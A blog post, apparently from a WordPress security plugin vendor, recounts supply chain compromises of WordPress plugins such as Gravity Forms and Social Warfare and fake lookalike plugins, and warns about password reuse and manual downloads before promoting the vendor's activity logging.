WordPress Supply Chain Attacks: When Trusted Sources Turn Malicious

Last July, Gravity Forms got compromised. Not a knockoff version from a sketchy download site. The official website. Millions of users trust this plugin. Anyone who manually downloaded it during a 48 hour window installed malware from the source they were supposed to trust.

This Is Not How It Is Supposed to Work

The standard security advice is simple: only download plugins from trusted sources. WordPress.org or the official vendor site. Check reviews. Look for active development. Avoid nulled plugins from random download sites.

Supply chain attacks bypass all of that. The source is trusted. The plugin is legitimate. The reviews are real. The problem is that somewhere between the developer and your website, someone inserted malicious code.

In the Gravity Forms case, attackers registered a lookalike domain and compromised the official download system. The malware exfiltrated site data, installed backdoors, and gave attackers the ability to create admin accounts and execute arbitrary code. A clean version was released within 48 hours, but anyone who downloaded during that window was infected.

Here is the uncomfortable detail: automatic updates through the WordPress dashboard were safe. Only manual downloads were affected. That distinction saved most users, but it also shows how narrow the margin can be.

It Keeps Happening

Two weeks before Gravity Forms, the same thing happened to Groundhogg. A marketing automation plugin. The official website was compromised. The GitHub repository stayed clean. Five confirmed downloads of the infected version, two installation attempts.

In 2024, attackers compromised five developer accounts on WordPress.org itself using passwords from previous data breaches. Social Warfare, a plugin with over 30,000 active installs, was one of them. The injected code created rogue admin accounts, exfiltrated credentials, and injected cryptomining scripts into website footers. Roughly 35,000 sites may have been affected.

The AccessPress Themes attack in 2021 and 2022 hit 93 themes and plugins with over 360,000 active installations. Some sites had malware installed for nearly three years before anyone noticed.

What Most People Get Wrong

The assumption is that if you follow the rules, you are safe. Use official sources. Keep plugins updated. Be careful what you install. That works against most threats. It does not work against supply chain attacks.

What surprised me when I started tracking these incidents is how often password reuse is the root cause. The WordPress.org repository attack succeeded because developers reused passwords that had been exposed in previous breaches. If your WordPress.org password is the same as any password you have used elsewhere, you are vulnerable.

The other thing people miss is that manual downloads are inherently riskier than automatic updates. When you update through the WordPress dashboard, WordPress.org handles distribution. When you download a zip file directly from a vendor website, you are trusting that website's security. That trust is not always warranted.

The Fake Plugin Problem

Over 6,000 WordPress sites were compromised in 2024 with fake plugins that displayed fake browser update alerts. The malicious plugins used names designed to look legitimate. One was called Wordfense Security, with an extra 'e'. Close enough to fool someone scanning quickly.

Users who clicked the fake update prompts downloaded infostealers. The plugins were installed on legitimate sites, serving malware to unsuspecting visitors. Your site can become a distribution point without you knowing.

The Scale Is Growing

In 2024, nearly 8,000 new vulnerabilities were discovered in the WordPress ecosystem. That was a 34% increase over the previous year. 96% of them are in plugins. Every plugin you install is a potential entry point.

In the first week of this year, 333 new vulnerabilities were reported across 253 plugins and 80 themes. 236 of them remain unpatched. Every week looks like this now.

The sites that will fare best are the ones with the fewest plugins, the fastest update cycles, and actual visibility into what is happening on their servers. Supply chain attacks are not going away. They are becoming more common and more sophisticated.

The question is not whether you will be exposed to one. The question is whether you will notice when it happens. That is why we built activity logging into our security plugin. You cannot protect against everything, but you can know when something changes.